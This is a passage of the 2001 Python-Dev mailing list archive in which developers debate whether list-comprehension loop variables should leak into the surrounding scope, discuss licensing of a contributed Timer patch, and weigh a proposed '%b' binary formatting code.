Just as an aside, I have never intentionally used the iterator > variable of a list comprehension after the operation has completed. Not even in a debugger, when the operation has completed via unexpected exception, and you're desperate to know what the control vrbl was bound to at the time of death? Or in an exception handler? >>> import sys >>> try: ... [i*i for i in xrange(sys.maxint)] ... except OverflowError: ... raise OverflowError("oops! blew up at %d" % i) ... Traceback (most recent call last): File "", line 4, in ? OverflowError: oops! blew up at 46341 >>> Or what about: i = 12 def f(): print i return [i for i in range(i)] f() 1. Should "print i" print 12, or raise UnboundLocalError? 2. Does the "i" in "range(i)" refer to the global i, or is that just senseless? So long as the for-loop model is followed faithfully, nothing is hard to explain or predict, and simply because there's nothing truly new. > I was actually quite surprised with this behavior the first time I saw > it. Me too . > I suspect most other programmers would not anticipate this side > effect either. I share the suspicion, but am not sure why: "for" is a binding construct in Python, so being surprised by "for" binding a name is itself surprising. Another principled model is possible, where [f(i) for i in whatever] is treated like (lambda: [f(i) for i in whatever])() >>> i = 12 >>> (lambda: [i**2 for i in range(4)])() [0, 1, 4, 9] >>> i 12 >>> That's more like Haskell does it. But the day we explain a Python construct in terms of a lambda transformation is the day Guido kills all of us . From esr@thyrsus.com Wed May 30 09:00:56 2001 From: esr@thyrsus.com (Eric S. Raymond) Date: Wed, 30 May 2001 04:00:56 -0400 Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: ; from tim.one@home.com on Wed, May 30, 2001 at 03:47:47AM -0400 References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu> Message-ID: <20010530040056.A27662@thyrsus.com> Tim Peters : > That's more like Haskell does it. But the day we explain a Python construct > in terms of a lambda transformation is the day Guido kills all of us . They'll get *my* lambdas when they pry them from my cold, dead fingers , but I find I don't have a strong opinion about how the scoping should work. -- Eric S. Raymond "Experience should teach us to be most on our guard to protect liberty when the government's purposes are beneficient... The greatest dangers to liberty lurk in insidious encroachment by men of zeal, well meaning but without understanding." -- Supreme Court Justice Louis Brandeis From thomas@xs4all.net Wed May 30 12:14:24 2001 From: thomas@xs4all.net (Thomas Wouters) Date: Wed, 30 May 2001 13:14:24 +0200 Subject: [Python-Dev] Re: [Patches] [ python-Patches-428326 ] Timer class for threading In-Reply-To: ; from noreply@sourceforge.net on Wed, May 30, 2001 at 02:16:31AM -0700 References: Message-ID: <20010530131424.Y690@xs4all.nl> On Wed, May 30, 2001 at 02:16:31AM -0700, noreply@sourceforge.net wrote: > OK, I'm un-withdrawing this patch. Just had to get things > straight with our lawyer. The patch is released under the > following license (the X11 license with 4 extra paragraphs > of disclaimers :): > http://www.zoteca.com/opensource/LICENSE.txt This raises an interesting point. Do we want separate pieces of the Python distribution to have separate licences ? I'd point out that the zoteca licence isn't mentioned on the OSI site as an Approved Licence, and that the licence contains a copyright notice, but no clear statement whether it's allowed to copy the licence other than together with the piece of software it's distributed with. The easiest solution would of course be for Itamar to get his boss/lawyers to give us the right to relicence it under the PSF licence :) -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From jack@oratrix.nl Wed May 30 13:26:39 2001 From: jack@oratrix.nl (Jack Jansen) Date: Wed, 30 May 2001 14:26:39 +0200 Subject: [Python-Dev] Re: [Patches] [ python-Patches-428326 ] Timer class for threading In-Reply-To: Message by Thomas Wouters , Wed, 30 May 2001 13:14:24 +0200 , <20010530131424.Y690@xs4all.nl> Message-ID: <20010530122702.F3FE53B8999@snelboot.oratrix.nl> > On Wed, May 30, 2001 at 02:16:31AM -0700, noreply@sourceforge.net wrote: > > > OK, I'm un-withdrawing this patch. Just had to get things > > straight with our lawyer. The patch is released under the > > following license (the X11 license with 4 extra paragraphs > > of disclaimers :): > > http://www.zoteca.com/opensource/LICENSE.txt > > [...] > > The easiest solution would of course be for Itamar to get his boss/lawyers > to give us the right to relicence it under the PSF licence :) I think this is the only viable solution. If various parts of Python have different license agreements this may well be a reason for people not to use Python because the hassle of figuring out which pieces fit their own licensing policy. -- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen@oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | see http://www.xs4all.nl/~tank/spg-l/sigaction.htm From beazley@cs.uchicago.edu Wed May 30 14:49:29 2001 From: beazley@cs.uchicago.edu (David Beazley) Date: Wed, 30 May 2001 08:49:29 -0500 (CDT) Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu> Message-ID: <15124.64105.184857.499019@gargoyle.cs.uchicago.edu> Tim Peters writes: > > Because of this, I have frequently found myself debugging the > > following programming error: > > If "frequently" is "a little more than usual", then it sounds like your > problems in all areas are too common for us to really help you by fixing > this one . I've probably been bitten by this about 5-10 times over the last few months. I can also say that it's a real bugger to track down when it happens. Now while this may just be a user problem on my part (which I can accept), I think there is a much deeper semantic problem with the current implementation of list comprehensions. Specifically, we now have this really cool list construction technique that is, for all practical purposes, an operator. Yet, at the same time, this "operator" has a really nasty side-effect of changing the values of variables in the surrounding scope in a very unnatural and unexpected way. More generally, it's essentially the same behavior that you would get if you wrote some code like this: a = expr(x,y) and expr() went off and nuked the value of x, replacing it with something completely different (note: I'm not talking about cases where x might be mutable here). Since you can write things like this a = [ 2*x for x in s] it's easy to view the right hand side as being isolated in the same way as a normal expression (where the name of the iteration variable "x" is incidental--a throwaway if you will). Maybe everyone else views list comprehensions as a series of statements (the syntactic sugar for nested for-loop idea). However, if you look at how they can be used, it's completely different than this. Specifically, if I write something like this: a = [2*x for x in s] + [3*x for x in t] I certainly don't conceptualize it as being literally expanded into the following sequence of statements: t1 = [ ] for x in s: t1.append(2*x) t2 = [ ] for x in t: t2.append(3*x) a = t1 + t2 > > I'm not sure it's worth losing the exact correspondence with nested loops; > or that it's not worth it either. Note that "the iterator variables" > needn't be bare names: > > >>> class x: > ... pass > ... > >>> [1 for x.i in range(3)] > [1, 1, 1] > >>> x.i > 2 > >>> > Hmmm. I didn't realize that you could even do this. Yes, this would definitely present a problem. However, if list comprehensions were modified not to assign any names in the current scope, it still seems like this would work (in this case, "x" is already defined and "x.i" is not creating a new name, but is setting an attribute on something else). Couldn't nested scopes be used to implement this in some manner? > > ... > > Just as an aside, I have never intentionally used the iterator > > variable of a list comprehension after the operation has completed. > > Not even in a debugger, when the operation has completed via unexpected > exception, and you're desperate to know what the control vrbl was bound to > at the time of death? Or in an exception handler? > Nope. I don't make programming mistakes---well, other than this one, and well, all of those other ones :-). > Another principled model is possible, where > > [f(i) for i in whatever] > > is treated like > > (lambda: [f(i) for i in whatever])() > > >>> i = 12 > >>> (lambda: [i**2 for i in range(4)])() > [0, 1, 4, 9] > >>> i > 12 > >>> > > That's more like Haskell does it. But the day we explain a Python construct > in terms of a lambda transformation is the day Guido kills all of us . Ah yes, well this is exactly the kind of behavior that seems most natural to me. It's also the behavior that everyone expected went I went around to the various Python hackers in the department and asked them about it yesterday. I suppose I could just write this: a = (lambda s: [2*i for i in s])(s) However, that's pretty ugly. In any case, I'm mostly just curious if anyone else has been bitten by the problem I've described. I would certainly love to see a fix for it (I would even volunteer to work on a prototype implementation if there is interest). On the other hand, if no changes are deemed necessary, we should at least try to better emphasize this behavior in the documentation--perhaps encouraging people to use private names. For example: a = [_i*2 for _i in t] (although, I have to say that this just looks like a gross hack--I'd rather not have to resort to doing this). Cheers, Dave From fdrake@acm.org Wed May 30 15:03:13 2001 From: fdrake@acm.org (Fred L. Drake, Jr.) Date: Wed, 30 May 2001 10:03:13 -0400 (EDT) Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: <15124.64105.184857.499019@gargoyle.cs.uchicago.edu> References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu> <15124.64105.184857.499019@gargoyle.cs.uchicago.edu> Message-ID: <15124.64929.215666.745913@cj42289-a.reston1.va.home.com> David Beazley writes: > Maybe everyone else views list comprehensions as a series of > statements (the syntactic sugar for nested for-loop idea). However, I certainly don't. I know that that was used as part of the design consideration, but it's not at all clear to me that this is desirable. If I see code like this: x = 42 L = [x**2 for x in range(2000)] print x I think it should map to something like this from C++: int x = 42; int L[2000]; for (int x = 0; x < 2000; ++x) { L[x] = x * x; } printf("%d\n", x); i.e., both *should* print "42\n" on standard output. Tim sez: > I'm not sure it's worth losing the exact correspondence with nested loops; > or that it's not worth it either. Note that "the iterator variables" > needn't be bare names: > > >>> class x: > ... pass > ... > >>> [1 for x.i in range(3)] > [1, 1, 1] > >>> x.i > 2 David: > Hmmm. I didn't realize that you could even do this. Yes, this would > definitely present a problem. However, if list comprehensions were I didn't realize this either. I'm quite surprised by it, in fact, though I understand (I think) why it works that way. But was this intentional? It seems like pure evil to me! I'd only expect it to support bare names and sequence unpacking (with only bare names at the "edge" of all nested unpackings). -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From gward@python.net Wed May 30 15:36:30 2001 From: gward@python.net (Greg Ward) Date: Wed, 30 May 2001 10:36:30 -0400 Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: <15124.64105.184857.499019@gargoyle.cs.uchicago.edu>; from beazley@cs.uchicago.edu on Wed, May 30, 2001 at 08:49:29AM -0500 References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu> <15124.64105.184857.499019@gargoyle.cs.uchicago.edu> Message-ID: <20010530103630.B11580@gerg.ca> On 30 May 2001, David Beazley said: > In any case, I'm mostly just curious if anyone else has been bitten by > the problem I've described. For the record, I have not been bitten by this, but I probably don't use list comps as much as you do. I can completely sympathize with both your and Tim's point of view here. Both make perfect sense at the same time. Hmmm. "Do I contradict myself? Very well then I contradict myself, (I am large, I contain multitudes)" Greg -- Greg Ward - Unix nerd gward@python.net http://starship.python.net/~gward/ Money is a powerful aphrodisiac. But flowers work almost as well. From barry@digicool.com Wed May 30 16:07:12 2001 From: barry@digicool.com (Barry A. Warsaw) Date: Wed, 30 May 2001 11:07:12 -0400 Subject: [Python-Dev] Re: [Patches] [ python-Patches-428326 ] Timer class for threading References: <20010530131424.Y690@xs4all.nl> <20010530122702.F3FE53B8999@snelboot.oratrix.nl> Message-ID: <15125.3232.925401.563151@anthem.wooz.org> >>>>> "TW" == Thomas Wouters writes: TW> The easiest solution would of course be for Itamar to get his TW> boss/lawyers to give us the right to relicence it under the TW> PSF licence :) >>>>> "JJ" == Jack Jansen writes: JJ> I think this is the only viable solution. If various parts of JJ> Python have different license agreements this may well be a JJ> reason for people not to use Python because the hassle of JJ> figuring out which pieces fit their own licensing policy. I completely agree. IMO, the most important job of the PSF is to make the Python IP sane again. That means clearing as much of the existing rights as possible, and releasing it under the NAIPL (New And Improved Python License). Any code that is licensed differently could mean that it'll be ripped out of some re-distributions. I'd be less concerned about some ancillary module that few people use, and much more concerned about some core piece of the code. -Barry From mal@lemburg.com Wed May 30 20:57:17 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Wed, 30 May 2001 21:57:17 +0200 Subject: [Python-Dev] Autoconf problems on BeOS Message-ID: <3B15509D.C790D5DF@lemburg.com> I have a bug report assigned to myself which really is more about autoconf than Unicode. The problem is that the SIZEOF_xxx tests cause the Metroworks compiler on BeOS to fail and this again causes these defines to be set to 0 ! Could someone with more autoconf experience please have a look ? https://sourceforge.net/tracker/?func=detail&aid=420416&group_id=5470&atid=105470 Thanks, -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From tim.one@home.com Wed May 30 21:07:37 2001 From: tim.one@home.com (Tim Peters) Date: Wed, 30 May 2001 16:07:37 -0400 Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: <15124.64929.215666.745913@cj42289-a.reston1.va.home.com> Message-ID: [Tim] > Note that "the iterator variables" needn't be bare names: [Fred] > I didn't realize this either. You have to get your head out of the docs and read more code . > I'm quite surprised by it, in fact, though I understand (I think) why > it works that way. But was this intentional? I expect so. > It seems like pure evil to me! Sometimes it's the bee's knees; for example, >>> digits = range(3) >>> x = [None] * 3 >>> base3 = [x[:] for x[0] in digits for x[1] in digits for x[2] in digits] >>> base3 [[0, 0, 0], [0, 0, 1], [0, 0, 2], [0, 1, 0], [0, 1, 1], [0, 1, 2], [0, 2, 0], [0, 2, 1], [0, 2, 2], [1, 0, 0], [1, 0, 1], [1, 0, 2], [1, 1, 0], [1, 1, 1], [1, 1, 2], [1, 2, 0], [1, 2, 1], [1, 2, 2], [2, 0, 0], [2, 0, 1], [2, 0, 2], [2, 1, 0], [2, 1, 1], [2, 1, 2], [2, 2, 0], [2, 2, 1], [2, 2, 2]] >>> I've done stuff "like that" often, albeit via the nested-loop spelling. > I'd only expect it to support bare names and sequence unpacking (with > only bare names at the "edge" of all nested unpackings). It's too late to take it away now! Python always worked this way. And it's really got nothing to do with what implementing what David wants (e.g., the lambda transformation I mentioned preserves its semantics) -- apart from (I hope) driving home that changes need to be considered very carefully. From tim.one@home.com Wed May 30 21:22:19 2001 From: tim.one@home.com (Tim Peters) Date: Wed, 30 May 2001 16:22:19 -0400 Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: <15124.64105.184857.499019@gargoyle.cs.uchicago.edu> Message-ID: [David Beazley, pretty much repeats why he doesn't like the current scheme] I hoped it was clear the first time I was at least half sympathetic! If it wasn't, I am . >> >>> i = 12 >> >>> (lambda: [i**2 for i in range(4)])() >> [0, 1, 4, 9] >> >>> i >> 12 >> >>> >> >> That's more like Haskell does it. > Ah yes, well this is exactly the kind of behavior that seems most > natural to me. It's also the behavior that everyone expected went I > went around to the various Python hackers in the department and asked > them about it yesterday. I believe that. > I suppose I could just write this: > > a = (lambda s: [2*i for i in s])(s) > > However, that's pretty ugly. It's too complicated, isn't it? In the presence of nested scopes (which are reality in 2.2), a = (lambda: [2*i for i in s])() does the same thing and is conceptually clearer. I'm not suggesting that you actually write that, but view it as a *model* for your intended semantics. I wouldn't want to see the implementation actually use a lambda under the covers, either, but we need some crisp way to explain the intent. Note that the lambda-trick *model* "does the right thing" for for-loop targets like x.i and x[i] too. > In any case, I'm mostly just curious if anyone else has been bitten by > the problem I've described. I would certainly love to see a fix for > it (I would even volunteer to work on a prototype implementation if > there is interest). I encourage that, but since it's not 100% backward-compatible you'll enjoy the usual range of hysterical opposition. Needs a PEP, and possibly even an associated future-statement. Overall, I'm more in favor of changing it than not. From skip@pobox.com (Skip Montanaro) Wed May 30 21:48:47 2001 From: skip@pobox.com (Skip Montanaro) (Skip Montanaro) Date: Wed, 30 May 2001 15:48:47 -0500 Subject: [Python-Dev] scoping and list comprehensions Message-ID: <15125.23727.168431.762320@beluga.mojam.com> Regarding the issue of how list comprehensions should relate to their environment, perhaps instead of modifying list comprehensions to make them execute in new local scopes (or at least appear to) a better solution would be to allow a new local scope to be introduced inline, sort of like in C: { int i; for (i=0; i < 10; i++) { dostuffwith(i); } } While this might be used more for list comprehensions than other constructs, I'm sure people will find a way to (ab)use it for other things as well. I don't see an obvious way of adding such functionality to Python without introducing a new keyword though, which is going to make it difficult to get past Guido: l = [] scope: l = [i**2 for i in range(10)] print l Hmmm, wait a minute, what if you terminated a block introducer (if or while clause or try/except clauses) with something other than a colon? (I'm just thinking out loud, I don't think this is necessarily a good solution). if 1: # no new scope introduced l = [i**2 for i in range(10)] print l vs. if 1; # new scope introduced for enclosed block l = [i**2 for i in range(10)] print l That certainly has some line noise qualities about it, especially since colons and semicolons are visually so similar, but does offer an alternative to introducing a new keyword into the language. Hmmm, wait another minute, perhaps you could simply overload def: l = [] def: l = [i**2 for i in range(10)] print l There's also the problem of how to export results from the scope, though perhaps the new nested scope stuff provides a solution to that. (I've ignored them so far, so I can't tell...) Would it be possible for the compiler to recognize the degenerate def: and simply mangle any names that would clash instead of introducing an actual new execution frame? The above might be equivalent to l = [] l = [__mangled_i**2 for __mangled_i in range(10)] print l if 'i' already existed in the same scope. Just thinking out loud. I'm not sure any of these ideas is any better than the current state of affairs. Skip From Greg.Wilson@baltimore.com Wed May 30 22:11:16 2001 From: Greg.Wilson@baltimore.com (Greg Wilson) Date: Wed, 30 May 2001 17:11:16 -0400 Subject: [Python-Dev] %b format? Message-ID: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com> I would like to add a "%b" format for converting numbers to binary format (1's and 0's). I realize this isn't a C-ism, but it would be very useful for teaching purposes, as newcomers find 101101 a lot easier to understand than 0x2D. Reactions? Greg ----------------------------------------------------------------------------------------------------------------- The information contained in this message is confidential and is intended for the addressee(s) only. If you have received this message in error or there are any problems please notify the originator immediately. The unauthorized use, disclosure, copying or alteration of this message is strictly forbidden. Baltimore Technologies plc will not be liable for direct, special, indirect or consequential damages arising from alteration of the contents of this message by a third party or as a result of any virus being passed on. In addition, certain Marketing collateral may be added from time to time to promote Baltimore Technologies products, services, Global e-Security or appearance at trade shows and conferences. This footnote confirms that this email message has been swept by Baltimore MIMEsweeper for Content Security threats, including computer viruses. From esr@thyrsus.com Wed May 30 22:28:38 2001 From: esr@thyrsus.com (Eric S. Raymond) Date: Wed, 30 May 2001 17:28:38 -0400 Subject: [Python-Dev] %b format? In-Reply-To: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com>; from Greg.Wilson@baltimore.com on Wed, May 30, 2001 at 05:11:16PM -0400 References: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com> Message-ID: <20010530172838.A778@thyrsus.com> Greg Wilson : > I would like to add a "%b" format for converting > numbers to binary format (1's and 0's). I realize > this isn't a C-ism, but it would be very useful for > teaching purposes, as newcomers find 101101 a lot > easier to understand than 0x2D. > > Reactions? +1. Didactically pretty useful, and the additional code won't boost global complexity much. -- Eric S. Raymond Where rights secured by the Constitution are involved, there can be no rule making or legislation which would abrogate them. -- Miranda vs. Arizona, 384 US 436 p. 491 From tim.one@home.com Wed May 30 22:30:49 2001 From: tim.one@home.com (Tim Peters) Date: Wed, 30 May 2001 17:30:49 -0400 Subject: [Python-Dev] Re: [Patches] [ python-Patches-428326 ] Timer class for threading In-Reply-To: <20010530131424.Y690@xs4all.nl> Message-ID: [Thomas Wouters] > This raises an interesting point. Do we want separate pieces of the > Python distribution to have separate licences ? This is a question for the PSF to resolve, since the PSF is intended to become the sole legal owner of Python's IP rights. My position will be that nothing ships in the distribution unless copyright has been assigned to the PSF, or the contributor has agreed to give the PSF a non-exclusive irrevocable etc license to release their work under the PSF license du jour. Fleshing out the second option so as to prevent abuse on either side is going to require significant effort ("what if the PSF goes away?", "what if the PSF changes its license to something I hate?", "what if I change my mind?", etc). Unfortunately, significant effort takes significant time too, and nobody has started on this yet. From mal@lemburg.com Wed May 30 22:31:06 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Wed, 30 May 2001 23:31:06 +0200 Subject: [Python-Dev] %b format? References: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com> <20010530172838.A778@thyrsus.com> Message-ID: <3B15669A.43B70A44@lemburg.com> "Eric S. Raymond" wrote: > > Greg Wilson : > > I would like to add a "%b" format for converting > > numbers to binary format (1's and 0's). I realize > > this isn't a C-ism, but it would be very useful for > > teaching purposes, as newcomers find 101101 a lot > > easier to understand than 0x2D. > > > > Reactions? > > +1. Didactically pretty useful, and the additional code won't boost > global complexity much. Good idea. The only question I have is: in which order will you print the 0s and 1s (MSB->LSB, LSB->MSB, little/big endian) ? I am thinking of adding a bit field type to mxNumber and have the same problem there... -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From esr@thyrsus.com Wed May 30 22:42:22 2001 From: esr@thyrsus.com (Eric S. Raymond) Date: Wed, 30 May 2001 17:42:22 -0400 Subject: [Python-Dev] Re: [Patches] [ python-Patches-428326 ] Timer class for threading In-Reply-To: ; from tim.one@home.com on Wed, May 30, 2001 at 05:30:49PM -0400 References: <20010530131424.Y690@xs4all.nl> Message-ID: <20010530174222.A1019@thyrsus.com> Tim Peters : > My position will be that nothing ships in the distribution unless copyright > has been assigned to the PSF, or the contributor has agreed to give the PSF > a non-exclusive irrevocable etc license to release their work under the PSF > license du jour. Fleshing out the second option so as to prevent abuse on > either side is going to require significant effort ("what if the PSF goes > away?", "what if the PSF changes its license to something I hate?", "what if > I change my mind?", etc). > > Unfortunately, significant effort takes significant time too, and nobody has > started on this yet. I think a PSF pleadge to use only an OSI-certified license would address some of these issues. Write it into the bylaws if necessary. -- Eric S. Raymond He that would make his own liberty secure must guard even his enemy from oppression: for if he violates this duty, he establishes a precedent that will reach unto himself. -- Thomas Paine From esr@thyrsus.com Wed May 30 22:44:57 2001 From: esr@thyrsus.com (Eric S. Raymond) Date: Wed, 30 May 2001 17:44:57 -0400 Subject: [Python-Dev] %b format? In-Reply-To: <3B15669A.43B70A44@lemburg.com>; from mal@lemburg.com on Wed, May 30, 2001 at 11:31:06PM +0200 References: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com> <20010530172838.A778@thyrsus.com> <3B15669A.43B70A44@lemburg.com> Message-ID: <20010530174457.B1019@thyrsus.com> M.-A. Lemburg : > > > I would like to add a "%b" format for converting > > > numbers to binary format (1's and 0's). I realize > > > this isn't a C-ism, but it would be very useful for > > > teaching purposes, as newcomers find 101101 a lot > > > easier to understand than 0x2D. > > > > +1. Didactically pretty useful, and the additional code won't boost > > global complexity much. > > Good idea. The only question I have is: in which order will > you print the 0s and 1s (MSB->LSB, LSB->MSB, little/big endian) ? > > I am thinking of adding a bit field type to mxNumber and have > the same problem there... For *this* context, we clearly want mathematical notation; MSB to the right and no byte-swapping. After all we'd actually be printing numerals, not dumping a bitfield. -- Eric S. Raymond The people of the various provinces are strictly forbidden to have in their possession any swords, short swords, bows, spears, firearms, or other types of arms. The possession of unnecessary implements makes difficult the collection of taxes and dues and tends to foment uprisings. -- Toyotomi Hideyoshi, dictator of Japan, August 1588 From barry@digicool.com Wed May 30 22:49:22 2001 From: barry@digicool.com (Barry A. Warsaw) Date: Wed, 30 May 2001 17:49:22 -0400 Subject: [Python-Dev] %b format? References: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com> Message-ID: <15125.27362.431144.886216@anthem.wooz.org> >>>>> "GW" == Greg Wilson writes: GW> I would like to add a "%b" format for converting numbers to GW> binary format (1's and 0's). For completeness, wouldn't you also want a binary integer literal so your students could write binary numbers in their code? And what about a binary() operator a la hex()? -Barry From tim.one@home.com Wed May 30 22:50:31 2001 From: tim.one@home.com (Tim Peters) Date: Wed, 30 May 2001 17:50:31 -0400 Subject: [Python-Dev] %b format? In-Reply-To: <3B15669A.43B70A44@lemburg.com> Message-ID: [Greg Wilson] > I would like to add a "%b" format for converting > numbers to binary format (1's and 0's). -0, due to compound lumpiness: hex() is to %x is to __hex__ as oct() is to %o is to __oct__ as nothing is to %b is to nothing. In that respect it's unfortunate that Python has distinct nb_oct and nb_hex slots in the PyNumberMethods struct (as opposed to a single parameterized "convert to base N string" method). [MAL] > Good idea. The only question I have is: in which order will > you print the 0s and 1s (MSB->LSB, LSB->MSB, little/big endian) ? I'm sure Greg has in mind only integers, in which case %x and %o already give the only useful answer. From fdrake@cj42289-a.reston1.va.home.com Wed May 30 22:51:22 2001 From: fdrake@cj42289-a.reston1.va.home.com (Fred Drake) Date: Wed, 30 May 2001 17:51:22 -0400 (EDT) Subject: [Python-Dev] [development doc updates] Message-ID: <20010530215122.3738C28849@cj42289-a.reston1.va.home.com> The development version of the documentation has been updated: http://python.sourceforge.net/devel-docs/ Update for development version of Python (2.2). This update substantially re-works the prototype support for productions of a formal grammar. They look better, support forward references to symbol definitions, and allow download of an all-text version of the complete grammar (with productions ordered the same way as they are in the documentation sources). "Documeting Python" now includes documentation for the LaTeX markup used to describe productions: http://python.sourceforge.net/devel-docs/doc/grammar-displays.html From esr@thyrsus.com Wed May 30 23:05:09 2001 From: esr@thyrsus.com (Eric S. Raymond) Date: Wed, 30 May 2001 18:05:09 -0400 Subject: [Python-Dev] %b format? In-Reply-To: ; from tim.one@home.com on Wed, May 30, 2001 at 05:50:31PM -0400 References: <3B15669A.43B70A44@lemburg.com> Message-ID: <20010530180509.B1305@thyrsus.com> Tim Peters : > -0, due to compound lumpiness: hex() is to %x is to __hex__ as oct() is to > %o is to __oct__ as nothing is to %b is to nothing. In that respect it's > unfortunate that Python has distinct nb_oct and nb_hex slots in the > PyNumberMethods struct (as opposed to a single parameterized "convert to > base N string" method). Is the right answer to add the convert-to-base slot and deprecate the other two? -- Eric S. Raymond If gun laws in fact worked, the sponsors of this type of legislation should have no difficulty drawing upon long lists of examples of criminal acts reduced by such legislation. That they cannot do so after a century and a half of trying -- that they must sweep under the rug the southern attempts at gun control in the 1870-1910 period, the northeastern attempts in the 1920-1939 period, the attempts at both Federal and State levels in 1965-1976 -- establishes the repeated, complete and inevitable failure of gun laws to control serious crime. -- Senator Orrin Hatch, in a 1982 Senate Report From fdrake@acm.org Wed May 30 23:00:15 2001 From: fdrake@acm.org (Fred L. Drake, Jr.) Date: Wed, 30 May 2001 18:00:15 -0400 (EDT) Subject: [Python-Dev] Most recent documentation update Message-ID: <15125.28015.611763.968854@cj42289-a.reston1.va.home.com> One thing I forgot to mention in my announcement of the update to the development documnetation which I just posted is that I went ahead and converted all but one of the productions in the Reference Manual to the new markup. The print_stmt production, unfortunately, is given twice instead of using a single model for the statement. The formatting tools don't support that (yet), and it's not clear that they should. (No, Barry, don't go changing it...!) -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From esr@thyrsus.com Wed May 30 23:03:41 2001 From: esr@thyrsus.com (Eric S. Raymond) Date: Wed, 30 May 2001 18:03:41 -0400 Subject: [Python-Dev] %b format? In-Reply-To: <15125.27362.431144.886216@anthem.wooz.org>; from barry@digicool.com on Wed, May 30, 2001 at 05:49:22PM -0400 References: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com> <15125.27362.431144.886216@anthem.wooz.org> Message-ID: <20010530180341.A1305@thyrsus.com> Barry A. Warsaw : > > >>>>> "GW" == Greg Wilson writes: > > GW> I would like to add a "%b" format for converting numbers to > GW> binary format (1's and 0's). > > For completeness, wouldn't you also want a binary integer literal so > your students could write binary numbers in their code? And what > about a binary() operator a la hex()? Barry is correct. If we're going to do this, we ought to do it right and support binary on a par with decimal, hex, and octal. I favor this. -- Eric S. Raymond The direct use of physical force is so poor a solution to the problem of limited resources that it is commonly employed only by small children and great nations. -- David Friedman From barry@digicool.com Wed May 30 23:05:37 2001 From: barry@digicool.com (Barry A. Warsaw) Date: Wed, 30 May 2001 18:05:37 -0400 Subject: [Python-Dev] Most recent documentation update References: <15125.28015.611763.968854@cj42289-a.reston1.va.home.com> Message-ID: <15125.28337.938136.505675@anthem.wooz.org> >>>>> "Fred" == Fred L Drake, Jr writes: Fred> (No, Barry, don't go changing it...!) Oh darn, three whole days work wasted... :) From tim.one@home.com Wed May 30 23:17:42 2001 From: tim.one@home.com (Tim Peters) Date: Wed, 30 May 2001 18:17:42 -0400 Subject: [Python-Dev] %b format? In-Reply-To: <15125.27362.431144.886216@anthem.wooz.org> Message-ID: Note that in Vyper (John Skaller's Python variant) these are legit integer literals: 0b11111111 0B11111111 0o777 0O777 0d999 0D999 0xfFf 0XFFf Vyper's octal notation is still ugly, but whoever first thought 0777 != 777 was a "good idea" was certifiably insane <0.25 wink>. From tim.one@home.com Wed May 30 23:29:33 2001 From: tim.one@home.com (Tim Peters) Date: Wed, 30 May 2001 18:29:33 -0400 Subject: [Python-Dev] %b format? In-Reply-To: <20010530180509.B1305@thyrsus.com> Message-ID: [Eric S. Raymond] > Is the right answer to add the convert-to-base slot and deprecate the > other two? That would fix "the other" lump here in Python, that e.g. >>> int("111", 3) 13 >>> has no inverse. string->int is happy with any base in 2..36 inclusive, but int->string is spelled via 3 different builtins covering only 3 of those bases. It would be more *expedient* to add "just" a __bin__/nb_bin method + a way to spell binary int literals + a %b format + a bin() builtin. On the fifth hand, I doubt anyone would want to add new % format codes for bases {2..36} - {2, 8, 10, 16}. So it will remain lumpy no matter what. I look forward to the PEP . From esr@thyrsus.com Wed May 30 23:38:33 2001 From: esr@thyrsus.com (Eric S. Raymond) Date: Wed, 30 May 2001 18:38:33 -0400 Subject: [Python-Dev] %b format? In-Reply-To: ; from tim.one@home.com on Wed, May 30, 2001 at 06:17:42PM -0400 References: <15125.27362.431144.886216@anthem.wooz.org> Message-ID: <20010530183833.B1654@thyrsus.com> Tim Peters : > Vyper's octal notation is still ugly, but whoever first thought > > 0777 != 777 > > was a "good idea" was certifiably insane <0.25 wink>. For anyone who doesn't know the history behind this... The 0xxx notation was copied from PDP-11 assembler literals -- the instruction-set design of the PDP-11 was such that most of the instruction subfields fit in octal digits, so this convention made it somewhat easier to read machine-code dumps. While I'm at it, I should note that the design of the 11 was ancestral to both the 8088 and 68000 microprocessors, and thus to essentially every new general-purpose computer designed in the last fifteen years. -- Eric S. Raymond "Are we to understand," asked the judge, "that you hold your own interests above the interests of the public?" "I hold that such a question can never arise except in a society of cannibals." -- Ayn Rand From esr@thyrsus.com Wed May 30 23:39:43 2001 From: esr@thyrsus.com (Eric S. Raymond) Date: Wed, 30 May 2001 18:39:43 -0400 Subject: [Python-Dev] %b format? In-Reply-To: ; from tim.one@home.com on Wed, May 30, 2001 at 06:29:33PM -0400 References: <20010530180509.B1305@thyrsus.com> Message-ID: <20010530183943.C1654@thyrsus.com> Tim Peters : > [Eric S. Raymond] > > Is the right answer to add the convert-to-base slot and deprecate the > > other two? > > That would fix "the other" lump here in Python, that e.g. > > >>> int("111", 3) > 13 > >>> > > has no inverse. string->int is happy with any base in 2..36 